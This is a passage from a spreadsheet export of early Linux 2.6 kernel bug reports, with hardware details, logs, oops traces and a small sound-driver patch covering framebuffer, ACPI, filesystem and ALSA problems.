    <t>Distribution: Debian Sarge Hardware Environment: Intel Celeron 1.3GHz, 512 MB RAM, SiS chipset ATI Rage IIc AGP X - driver : ati another hw information: http://mamutik.ucw.cz/bug_atyfb/dmesg http://mamutik.ucw.cz/bug_atyfb/kernel_config http://mamutik.ucw.cz/bug_atyfb/lspci_vv http://mamutik.ucw.cz/bug_atyfb/lsmod Software Environment: X-Window 4.2.1.1 Problem Description: modprobe atyfb in console causes blank without text.it is possible write in keybord,run command in console.if i run mc, i see only any background, no text. if i run fbset 640x480-100 , screen is black with color points. option for boot: with (acpi=force) and without acpi is the same result. Steps to reproduce: modprobe atyfb for any information,testing contact me personally, i am not in list.</t>
  </si>
  <si>
    <t>Alexey Starikovskiy</t>
  </si>
  <si>
    <t>Simple Boot Flags 2.0</t>
  </si>
  <si>
    <t>2004-01-20 21:34 UTC</t>
  </si>
  <si>
    <t>2004-11-22 10:03 UTC</t>
  </si>
  <si>
    <t>Hardware Vendors implement the "Simple Boot Flag Specification". http://www.microsoft.com/whdc/hwdev/resources/specs/simp_bios.mspx The ACPI "BOOT" table specifies the location of a BOOT flag register in CMOS. Eg. you'll see the BOOT table enumerated in your dmesg today: ACPI: RSDP (v000 TOSHIB ) @ 0x000f01b0 ACPI: RSDT (v001 TOSHIB 750 0x00970814 TASM 0x04010000) @ 0x1ffd0000 ... ACPI: BOOT (v001 TOSHIB 750 0x00970814 TASM 0x04010000) @ 0x1ffd0034 There are 3 flags: 0. PNPOS -- set to tell BIOS to configure only boot devices because the OS is a "plug-and-play" OS that will configure the devices. 1. BOOTING -- BIOS sets in POST, OS clears on successful boot. If POST sees this set when it starts, it sets DIAG on the assumption that the previous boot failed. 2. DIAG -- if clear, boot as fast as possible; otherwise run diags There is no reason that Linux can't take advantage of these features. The primary benefit will be to clear DIAG to make POST run faster. Linux may also want to recognize DIAG to perform more conservative initialization, such as checking file systems etc.</t>
  </si>
  <si>
    <t>vga16fb doesn't work properly</t>
  </si>
  <si>
    <t>2.6.0 and 2.6.1</t>
  </si>
  <si>
    <t>2004-01-21 01:52 UTC</t>
  </si>
  <si>
    <t>Anton K</t>
  </si>
  <si>
    <t>In 2.4.20(21,22) vga16fb works fine with QT Embedded, but with 2.6.0(1) I have problem - black screen and no reactions on keyboard. I tryed to recompile QTE with kernel2.6 headers - same result. When I load vga16fb in kernel2.4, console switched to 80x30 mode, but in kernel2.6 - not. Is this normal?</t>
  </si>
  <si>
    <t>2.6.2-rc1</t>
  </si>
  <si>
    <t>Janosch Machowinski</t>
  </si>
  <si>
    <t>drivers_video-other</t>
  </si>
  <si>
    <t>platform_i386</t>
  </si>
  <si>
    <t>2.6.1-mm5: Double fault after registering protocol family 10</t>
  </si>
  <si>
    <t>2.6.1-mm5</t>
  </si>
  <si>
    <t>2004-01-21 13:07 UTC</t>
  </si>
  <si>
    <t>2004-01-21 14:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1 Hardware Environment: Intel Pentium IV 2 Ghz Intel PlatiniX 2D/533-A (Intel 845E) Microsoft Intellimouse Explorer USB Microsoft Natural Keyboard Elite PS/2 Dual 3Com Ethernet 3c905-TX NIC ATI Radeon 7000VE AGP 32MB Software Environment: Fedora Linux Core 1 Kernel 2.6.1-mm5 Problem Description: When trying to boot 2.6.1-mm5, I get the following double fault: serio: i8042 AUX port at 0x60,0x64 irq 12 atkbd.c: Unknown key pressed (raw set 0, code 0x17e on isa0060/serio1). atkbd.c: Use 'setkeycodes 7e &lt;keycode&gt;' to make it known. serio: i8042 KBD port at 0x60,0x64 irq 1 input: AT Translated Set 2 keyboard on isa0060/serio0 Advanced Linux Sound Architecture Driver Version 1.0.1 (Tue Dec 30 10:04:14 2003 UTC). intel8x0_measure_ac97_clock: measured 49321 usec intel8x0: clocking to 48000 ALSA device list: #0: Intel 82801BA-ICH2 at 0xbc00, irq 17 NET: Registered protocol familiy 2 IP: routing cache hash table of 1024 buckets, 32Kbytes TCP: Hash tabes configured (established 32768 bind 9362) IPv4 over IPv4 tunneling driver GRE over IPv4 tunneling driver Initializing IPsec netlink socket NET: Registered protocol family 1 NET: Registered protocol family 10 double fault, gdt at c03fc000 [255 bytes] double fault, tss at c04a4000 eip = c0122526, esp = dff9c000 eax = c14e33b0, ebx = 00000000, ecx = 00000063, edx = 00000063 esi = c14e33b0, edi = 00000000, ebp = dff9c000 The same configuration works perfectly with 2.6.1-mm4. Steps to reproduce: Compile 2.6.1-mm5 using the attached .config file, then boot up with the compiled kernel.</t>
  </si>
  <si>
    <t>2.6.1 fails to mount large iso9660 dvd discs with ATAPI drivers, succeeds with SCSI.</t>
  </si>
  <si>
    <t>2004-01-21 16:28 UTC</t>
  </si>
  <si>
    <t>Jeff Gardner</t>
  </si>
  <si>
    <t>2004-12-18 14:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Abit NF-7 (nforce2) Mobo, Athlon-XP 2500 (Barton), TDK Indi DVD+RW, Creative PC-DVD. ################################################################################ Software Environment: Linux gentoo 2.6.1 #3 Wed Jan 21 17:53:53 CST 2004 i686 AMD Athlon(tm) XP 2500+ AuthenticAMD GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 0.9.15-pre4 e2fsprogs 1.34 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.12 Net-tools 1.60 Kbd 1.08 Sh-utils 5.0.91 Modules Loaded nvnet nvidia ################################################################################ Problem Description: I've used growisofs (a mkisofs frontend) to write big (1.4 Gb) .avi's to my DVD+RW under both 2.4.xx and 2.6 kernels (atapi on the 2.6). However, none of my 2.6 kernels (atapi only) seem to be able to mount nearly full dvd's, while my 2.4.24 kernel (scsi-emulation) can mount dvd's that are full (about 4.3 Gb). Enabling scsi emulation and passing hdc=ide-scsi at boot fixes the problem for linux-2.6.1, so it seems that there may be a problem with an atapi-only dvdrom mounting dvd's with over 3.3 Gb on them. I also have a regular dvdplayer attched and it is known as: /dev/cdroms/cdrom0 -&gt; ../ide/host0/bus1/target1/lun0/cd This drive reports "No medium found" for any large iso9660 dvd's, but can mount UDF disks no problem. Steps to reproduce: # Big iso9660 (4.0 Gb total) $ mount /mnt/dvdburner/ mount: block device /dev/cdroms/cdrom0 is write-protected, mounting read-only mount: wrong fs type, bad option, bad superblock on /dev/cdroms/cdrom0, or too many mounted file systems # Output from tail -f /var/log/kernel/current Jan 21 10:29:05 [kernel] Unable to identify CD-ROM format. ############################################### # Smaller iso9660 (3.3 Gb total) $ mount /mnt/dvdburner/ mount: block device /dev/cdroms/cdrom0 is write-protected, mounting read-only # Output from tail -f /var/log/kernel/current Jan 21 10:32:12 [kernel] ISO 9660 Extensions: Microsoft Joliet Level 3 Jan 21 10:32:12 [kernel] ISO 9660 Extensions: RRIP_1991A ############################################### Both of these DVD's were made using growisofs, and the only difference I can see is that they are of different size. Please let me know if there is anything else I can do to further troubleshoot this problem. Thanks.</t>
  </si>
  <si>
    <t>2.6.2-rc1: temperature from sensor as99127f-i2c-1-2d wrong</t>
  </si>
  <si>
    <t>2004-01-21 18:24 UTC</t>
  </si>
  <si>
    <t>kdebugs4reinhard</t>
  </si>
  <si>
    <t>2004-01-22 04:06 UTC</t>
  </si>
  <si>
    <t>Distribution: self burned Hardware Environment: Athlon 2600+, Asus A7V8X Board Software Environment: gcc 3.3.2, binutil 2.14, kernel 2.6.2-rc1 Problem Description: In kernel 2.6.2-rc1 the temperature from as99127f sensors for CPU an board is not any more available. In 2.6.1 good temperature values were measured. Steps to reproduce: read temperature with sensor tool: as99127f-i2c-1-2d Adapter: SMBus Via Pro adapter at e800 Algorithm: Unavailable from sysfs VCore 1: +1.66 V (min = +1.31 V, max = +1.97 V) VCore 2: +1.68 V (min = +1.31 V, max = +1.97 V) +3.3V: +3.23 V (min = +2.96 V, max = +3.63 V) +5V: +4.87 V (min = +4.49 V, max = +5.51 V) +12V: +12.52 V (min = +9.55 V, max = +14.41 V) -12V: -13.10 V (min = -0.00 V, max = -0.00 V) -5V: -4.96 V (min = -0.00 V, max = -0.00 V) fan1: 2789 RPM (min = 3000 RPM, div = 2) fan2: 0 RPM (min = 3000 RPM, div = 2) fan3: 0 RPM (min = 3000 RPM, div = 2) ERROR: Can't get TEMP1 data! ERROR: Can't get TEMP2 data! ERROR: Can't get TEMP3 data! vid: +1.650 V alarms: beep_enable: Sound alarm enabled</t>
  </si>
  <si>
    <t>framebuffer problem for silicommotion SM910</t>
  </si>
  <si>
    <t>2004-01-23 08:42 UTC</t>
  </si>
  <si>
    <t>Jungsoo Kim</t>
  </si>
  <si>
    <t>2006-01-24 05:42 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian Hardware Environment:silicon motion SM910 (in Trigem F48D (Notebook)) Software Environment:Debian + Gnome 2.4 + Xfree 4.2.1 Problem Description: 1. When I boot with framebuffer console(at lilo, vga=791), boot processes does not continue after 3 seconds. The boot processes works good with vga=normal. I checked framebuffer console support setting at the kernel config. 2. When I use the Xfree4.2.1 with framebuffer driver --"fbdev", the X does not find framebuffer device "/dev/fb0". But in real, /dev/fb0 exists and I checed vesa framebuffer support setting at the kernel config. Steps to reproduce:</t>
  </si>
  <si>
    <t>ACPI Extensions for Display Adapters</t>
  </si>
  <si>
    <t>2004-01-23 14:30 UTC</t>
  </si>
  <si>
    <t>2004-11-15 20:11 UTC</t>
  </si>
  <si>
    <t>1878 1943</t>
  </si>
  <si>
    <t>Systems containing a built-in display adapter are requred to implement the ACPI Extensions for Display Adapters. -- ACPI Spec 2.0c appendix B. These extensions involved brightness control, device switching, and power state support. Currently, some of these features are implemented in the asus_extras and toshiba_extras drivers. A generic drivers/acpi/video.c driver should be created to support these features on all vendors platforms. When it is available, that functionality should be removed from the asus and toshiba specific drivers.</t>
  </si>
  <si>
    <t>2004-01-24 05:42 UTC</t>
  </si>
  <si>
    <t>Thomas Glanzmann</t>
  </si>
  <si>
    <t>2004-01-24 11:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian with 4.3.0-0ds2.0.0woody2 Hardware Environment: PC Software Environment: Newest bitkeeper tree of Linus 2.5.x tree Problem Description: xev reports Printscreen to be pressed thrice when I hit it once. Steps to reproduce: A friend of mine can reproduce this with debian testing and 2.6.1 Press Printscreen and watch xev. This doesn't happen under showkeys on the console! But the kernel plays some role on this because this problem doesn't appears with the last 2.4 version KeyPress event, serial 27, synthetic NO, window 0x1000001, root 0x48, subw 0x0, time 710693, (300,144), root:(301,145), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 characters: "" KeyRelease event, serial 27, synthetic NO, window 0x1000001, root 0x48, subw 0x0, time 710693, (300,144), root:(301,145), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 characters: "" KeyPress event, serial 27, synthetic NO, window 0x1000001, root 0x48, subw 0x0, time 710693, (300,144), root:(301,145), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 characters: "" KeyRelease event, serial 27, synthetic NO, window 0x1000001, root 0x48, subw 0x0, time 710787, (300,144), root:(301,145), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 characters: "" KeyPress event, serial 27, synthetic NO, window 0x1000001, root 0x48, subw 0x0, time 710787, (300,144), root:(301,145), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 characters: "" KeyRelease event, serial 27, synthetic NO, window 0x1000001, root 0x48, subw 0x0, time 710787, (300,144), root:(301,145), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 characters: ""</t>
  </si>
  <si>
    <t>cscope support doesn't work because no cscope.files is created</t>
  </si>
  <si>
    <t>2004-01-24 06:46 UTC</t>
  </si>
  <si>
    <t>2004-01-26 18:33 UTC</t>
  </si>
  <si>
    <t>Software Environment: cscope Problem Description: when doing a make cscope in the top directory a cscope.out is created but no cscope.files But cscope isn't useable without a cscope.files So the line in the makefile should be changed from: cmd_cscope = $(all-sources) | cscope -k -b -i - to: cmd_cscope = $(all-sources) &gt; cscope.files; cscope -k -b</t>
  </si>
  <si>
    <t>some problem on file process</t>
  </si>
  <si>
    <t>2004-01-24 08:25 UTC</t>
  </si>
  <si>
    <t>leo cardia</t>
  </si>
  <si>
    <t>2004-01-24 10:34 UTC</t>
  </si>
  <si>
    <t>1. corrupt file process on kernel 2.6.1 2. --------- Some problem on File system or binary process --------- [root@dgtalx xiopadm]# touch: creating `/sqldir/var/dgtalx.net.err': Input/output error /sqldir/bin/safe_mysqld: /bin/chown: cannot execute binary file Starting mysqld daemon with databases from /sqldir/var /sqldir/bin/safe_mysqld: /sqldir/var/dgtalx.net.err: Input/output error /sqldir/bin/safe_mysqld: /sqldir/var/dgtalx.net.err: Input/output error tee: /sqldir/var/dgtalx.net.err: Input/output error 040124 22:01:48 mysqld ended tee: /sqldir/var/dgtalx.net.err: Input/output error [root@dgtalx var]# touch dgtalx.net.err touch: creating `dgtalx.net.err': Input/output error [root@dgtalx var]# ll ls: dgtalx.net.err: Input/output error --- cut --- [root@dgtalx var]# rm -f dgtalx.net.err [root@dgtalx var]# service mysqld start [root@dgtalx var]# /sqldir/bin/safe_mysqld: /bin/chown: cannot execute binary file Starting mysqld daemon with databases from /sqldir/var [root@dgtalx var]# chown bash: /bin/chown: cannot execute binary file [root@dgtalx var]# file /bin/chown /bin/chown: data [root@dgtalx var]# strace /bin/chown strace: exec: Exec format error execve("/bin/chown", ["/bin/chown"], [/* 26 vars */]) = 0 ----------- REBOOT ---------------- [root@dgtalx var]# file /bin/chown /bin/chown: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped mysql daemon successfully started ----------- TEST REBOOT ---------------- [root@dgtalx var]# tail dgtalx.net.err 040125 00:35:59 mysqld ended 040125 00:38:31 mysqld started /sqldir/bin/safe_mysqld: /usr/bin/nohup: cannot execute binary file 040125 00:38:31 mysqld ended 040125 00:42:23 mysqld started /sqldir/bin/safe_mysqld: /usr/bin/nohup: cannot execute binary file 040125 00:42:23 mysqld ended [root@dgtalx var]# nohup bash: /usr/bin/nohup: cannot execute binary file [root@dgtalx var]# whereis nohup nohup: /usr/bin/nohup /usr/share/man/man1/nohup.1.gz ----------- REBOOT ---------------- [root@dgtalx var]# nohup Usage: /usr/bin/nohup COMMAND [ARG]... or: /usr/bin/nohup OPTION Try `/usr/bin/nohup --help' for more information. ============================================== What happen occurd in my server? Error Kernel : 2.6.1 gcc 3.2.2 glibc don't know (rpm didn't work) maybe 2.3.? personal modify linux server Now I got more problem on file system (erase lib/rpm/__db.001 ) [root@dgtalx rpm]# rpm -qa rpmdb: write: 0xbfffc520, 8192: Invalid argument error: db4 error(22) from dbenv-&gt;open: Invalid argument error: cannot open Packages index using db3 - Invalid argument (22) error: cannot open Packages database in /var/lib/rpm no packages (2nd try) [root@dgtalx rpm]# rpm -qa rpmdb: unable to join the environment error: db4 error(11) from dbenv-&gt;open: Resource temporarily unavailable error: cannot open Packages index using db3 - Resource temporarily unavailable (11) error: cannot open Packages database in /var/lib/rpm no packages rpm db is safe, no errors, no corruption on 2.4.22 but only 2.6.1 have trouble. 3. Filesystem, binary process 4. Linux version 2.6.1 (root@dgtalx.net) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #5 Sun Jan 25 00:29:00 KST 2004 5. n/a 6. n/a 7-1. based redhat 7.1 -&gt; modified -&gt; redhat 9.0 system change -&gt; glibc change (6 month ago) -&gt; stable system 7-2. Pentium III (Coppermine) 600Mhz 7-3. i'm static compile user 7-4. 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 02f8-02ff : serial 0376-0376 : ide1 03c0-03df : vga+ 03f6-03f6 : ide0 03f8-03ff : serial 0400-043f : 0000:00:07.3 0440-045f : 0000:00:07.3 0cf8-0cff : PCI conf1 d000-dfff : PCI Bus #01 ec00-ec7f : 0000:00:10.0 ec00-ec7f : 0000:00:10.0 ef80-ef9f : 0000:00:07.2 ffa0-ffaf : 0000:00:07.1 ffa0-ffa7 : ide0 ffa8-ffaf : ide1 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000f0000-000fffff : System ROM 00100000-17ffffff : System RAM 00100000-00321491 : Kernel code 00321492-003e8dff : Kernel data f2800000-f28fffff : PCI Bus #01 f4000000-f5ffffff : 0000:00:00.0 f6a00000-f6afffff : PCI Bus #01 f8000000-fbffffff : 0000:00:11.0 febeff80-febeffff : 0000:00:10.0 fec00000-fec00fff : reserved fee00000-fee00fff : reserved fffc0000-ffffffff : reserved 7-5. 00:00.0 Host bridge: Intel Corporation 440BX/ZX - 82443BX/ZX Host bridge (rev 03) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 64 Region 0: Memory at f4000000 (32-bit, prefetchable) [size=32M] Capabilities: [a0] AGP version 1.0 Status: RQ=31 SBA+ 64bit- FW- Rate=x1,x2 Command: RQ=0 SBA- AGP- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: Intel Corporation 440BX/ZX - 82443BX/ZX AGP bridge (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: f6a00000-f6afffff Prefetchable memory behind bridge: f2800000-f28fffff BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B+ 00:07.0 ISA bridge: Intel Corporation 82371AB PIIX4 ISA (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:07.1 IDE interface: Intel Corporation 82371AB PIIX4 IDE (rev 01) (prog-if 80 [Master]) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Region 4: I/O ports at ffa0 [size=16] 00:07.2 USB Controller: Intel Corporation 82371AB PIIX4 USB (rev 01) (prog-if 00 [UHCI]) Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin D routed to IRQ 0 Region 4: I/O ports at ef80 [size=32] 00:07.3 Bridge: Intel Corporation 82371AB PIIX4 ACPI (rev 02) Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin ? routed to IRQ 9 00:10.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) Subsystem: 3Com Corporation 3C905B Fast Etherlink XL 10/100 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (2500ns min, 2500ns max), cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at ec00 [size=128] Region 1: Memory at febeff80 (32-bit, non-prefetchable) [size=128] Expansion ROM at febc0000 [disabled] [size=128K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0- ,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.0 VGA compatible controller: S3 Inc. Trio 64V2/DX or /GX (rev 16) (prog- if 00 [VGA]) Subsystem: S3 Inc. 86C775 Trio64V2/DX, 86C785 Trio64V2/GX Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 10 Region 0: Memory at f8000000 (32-bit, non-prefetchable) [size=64M] Expansion ROM at febf0000 [disabled] [size=64K] 7-6. i haven't scsi device 7-7. n/a</t>
  </si>
  <si>
    <t>kernel BUG at mm/mmap.c:1443, with compile load</t>
  </si>
  <si>
    <t>2004-01-24 08:52 UTC</t>
  </si>
  <si>
    <t>Henning Westerholt</t>
  </si>
  <si>
    <t>2004-12-02 11:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 Hardware Environment: AMD Athlon(tm) XP 1900+, X86 Software Environment: gcc-3.2.3, sh, Python (ebuild-environment) Problem Description: The compiling of a new glibc Version (3.2.3) abort with a Segmentation fault, or hang forever. Steps to reproduce: Restart the compiling process. ---- Bug 1: ------------[ cut here ]------------ kernel BUG at mm/mmap.c:1443! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c014e1c2&gt;] Not tainted EFLAGS: 00010202 EIP is at exit_mmap+0x182/0x190 eax: 00000001 ebx: ec7aed40 ecx: 000de000 edx: 00000000 esi: ec7aed40 edi: f3722000 ebp: ec7aed60 esp: f3723e78 ds: 007b es: 007b ss: 0068 Process mkinstalldirs (pid: 19847, threadinfo=f3722000 task=f26a8100) Stack: f3723e90 ec7aed40 f475df80 00000000 ffffffff f3723e94 c046c548 0000004c ec7aed40 ec7aed60 f26a8100 c011f745 ec7aed40 c03b4938 ec7aed40 c012379d ec7aed40 ec7aed40 f26a86c4 f26a8100 f3722000 0000000b 0000000b f3722000 Call Trace: [&lt;c011f745&gt;] mmput+0x65/0xc0 [&lt;c012379d&gt;] do_exit+0x15d/0x3f0 [&lt;c0123b1b&gt;] do_group_exit+0x7b/0xc0 [&lt;c012ccc1&gt;] get_signal_to_deliver+0x1f1/0x380 [&lt;c0109272&gt;] do_signal+0xe2/0x120 [&lt;c016756b&gt;] do_pipe+0x17b/0x1f0 [&lt;c010f07e&gt;] destroy_context+0x6e/0xd0 [&lt;c0120ef4&gt;] __mmdrop+0x34/0x46 [&lt;c011dafc&gt;] schedule+0x3bc/0x590 [&lt;c012cec0&gt;] sigprocmask+0x40/0xc0 [&lt;c012d03a&gt;] sys_rt_sigprocmask+0xfa/0x160 [&lt;c011bbf0&gt;] do_page_fault+0x0/0x4e2 [&lt;c0109309&gt;] do_notify_resume+0x59/0x5c [&lt;c01094e6&gt;] work_notifysig+0x13/0x15 Code: 0f 0b a3 05 7f 9f 36 c0 e9 06 ff ff ff 90 83 ec 28 89 5c 24 &lt;6&gt;note: mkinstalldirs[19847] exited with preempt_count 1 ------ Bug 2: ------------[ cut here ]------------ kernel BUG at mm/mmap.c:1443! invalid operand: 0000 [#2] CPU: 0 EIP: 0060:[&lt;c014e1c2&gt;] Not tainted EFLAGS: 00010202 EIP is at exit_mmap+0x182/0x190 eax: 00000001 ebx: eb0fab80 ecx: 0007f000 edx: 00000000 esi: eb0fab80 edi: dbaf8000 ebp: eb0faba0 esp: dbaf9e78 ds: 007b es: 007b ss: 0068 Process sh (pid: 30682, threadinfo=dbaf8000 task=ed045320) Stack: dbaf9e90 eb0fab80 f2b50340 00000000 ffffffff dbaf9e94 c046c548 0000003d eb0fab80 eb0faba0 ed045320 c011f745 eb0fab80 c03b4938 eb0fab80 c012379d eb0fab80 eb0fab80 ed0458e4 ed045320 dbaf8000 0000000b 0000000b dbaf8000 Call Trace: [&lt;c011f745&gt;] mmput+0x65/0xc0 [&lt;c012379d&gt;] do_exit+0x15d/0x3f0 [&lt;c0123b1b&gt;] do_group_exit+0x7b/0xc0 [&lt;c012ccc1&gt;] get_signal_to_deliver+0x1f1/0x380 [&lt;c0109272&gt;] do_signal+0xe2/0x120 [&lt;c0124217&gt;] sys_wait4+0x1f7/0x290 [&lt;c012e04b&gt;] sys_rt_sigaction+0xfb/0x120 [&lt;c011bbf0&gt;] do_page_fault+0x0/0x4e2 [&lt;c0109309&gt;] do_notify_resume+0x59/0x5c [&lt;c01094e6&gt;] work_notifysig+0x13/0x15 Code: 0f 0b a3 05 7f 9f 36 c0 e9 06 ff ff ff 90 83 ec 28 89 5c 24 &lt;6&gt;note: sh[30682] exited with preempt_count 1</t>
  </si>
  <si>
    <t>Feature request.  Implement _CST support.</t>
  </si>
  <si>
    <t>2004-01-27 02:38 UTC</t>
  </si>
  <si>
    <t>Bruno Ducrot</t>
  </si>
  <si>
    <t>2005-01-21 21:39 UTC</t>
  </si>
  <si>
    <t>It may be nice to add _CST support. This will allow to get more power saving in the idle loop for processors that are able to do deeper sleep state, like P3m (tualatin), P4m, and Banias, to name a few.</t>
  </si>
  <si>
    <t>cs46xx driver mmap_valid 0--&gt;1 in kernel 2.6.x?</t>
  </si>
  <si>
    <t>2.6.x</t>
  </si>
  <si>
    <t>2004-01-27 04:17 UTC</t>
  </si>
  <si>
    <t>Janne Pikkarainen</t>
  </si>
  <si>
    <t>2004-05-21 03:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Asus A7V133, AMD Athlon Software Environment: Gentoo Linux 1.4, default-x86-1.4, gcc-3.3.2, glibc-2.3.3_pre20040117-r0, 2.6.2-rc1-mm2 Problem Description: This problem has been bothering me all over the kernel 2.6.x. I don't know if any other applications are affected by this bug, but a game called Enemy Territory surely is. With the default kernel 2.6 cs46xx driver (with "new DSP support" enabled) the sound in Enemy Territory doesn't work at all, complaining "unable to mmap /dev/dsp" during the ET startup. But if I do the patch below to cs46xx.c, sound starts to work. The patch I've used: --- --- cs46xx_old.c 2004-01-27 14:09:46.625277768 +0200 +++ cs46xx.c 2004-01-27 12:32:28.000000000 +0200 @@ -54 +54 @@ -static int mmap_valid[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS - 1)] = 0}; +static int mmap_valid[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS - 1)] = 1}; --- Is there a reason to keep mmap_valid=0 in cs46xx driver or is this a real bug? I haven't seen any new bugs with this patch applied, all the multimedia applications (mplayer, xine, xmms, noatun) keeps on working.</t>
  </si>
  <si>
    <t>Alsa module snd-cs4281 first load fail</t>
  </si>
  <si>
    <t>2004-01-28 01:03 UTC</t>
  </si>
  <si>
    <t>Alexey Anikeenko</t>
  </si>
  <si>
    <t>2005-07-13 17:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Cirrus Logic Crystal CS4281 PCI Audio (rev 01) 00:00.0 Host bridge: ALi Corporation M1541 (rev 04) 00:01.0 PCI bridge: ALi Corporation M1541 PCI to AGP Controller (rev 04) 00:02.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:07.0 ISA bridge: ALi Corporation M1533 PCI to ISA Bridge [Aladdin IV] (rev c3) 00:0a.0 Multimedia audio controller: Cirrus Logic Crystal CS4281 PCI Audio (rev 01) 00:0f.0 IDE interface: ALi Corporation M5229 IDE (rev c2) 01:00.0 VGA compatible controller: S3 Inc. 86c368 [Trio 3D/2X] (rev 02) Software Environment: module-init-tools version 3.0-pre5 Problem Description: First attempt to load driver snd-cs4281 brings an error: PCI: Found IRQ 11 for device 0000:00:0a.0 never read ISV3 and ISV4 from AC'97 CS4281: probe of 0000:00:0a.0 failed with error -5 After this message driver is loaded, but mixer and sound don't work. lsmod after first modprobe: Module Size Used by snd_cs4281 13568 0 snd_rawmidi 18688 1 snd_cs4281 snd_pcm 77252 1 snd_cs4281 snd_page_alloc 8644 1 snd_pcm snd_ac97_codec 45732 1 snd_cs4281 snd_opl3_lib 8032 1 snd_cs4281 snd_seq_device 6184 2 snd_rawmidi,snd_opl3_lib snd_timer 19716 2 snd_pcm,snd_opl3_lib snd_hwdep 6944 1 snd_opl3_lib snd 38820 8 snd_cs4281,snd_rawmidi,snd_pcm,snd_ac97_codec,snd_opl3_lib,snd_seq_device,snd_t imer,snd_hwdep soundcore 6592 1 snd rmmod snd-cs4281 and loading it second time makes sound work. Steps to reproduce: 1. modprobe snd-cs4281 2. rmmod snd-cs4281 3. modprobe snd-cs4281</t>
  </si>
  <si>
    <t>2.6.2</t>
  </si>
  <si>
    <t>Max Alekseyev</t>
  </si>
  <si>
    <t>fs_other</t>
  </si>
  <si>
    <t>Jan "Yenya" Kasprzak</t>
  </si>
  <si>
    <t>2.6.1 client does not find symlinked files on nfs-mounted share reliably</t>
  </si>
  <si>
    <t>2.6.1 (client), 2.4.24 or 2.6.1 (server)</t>
  </si>
  <si>
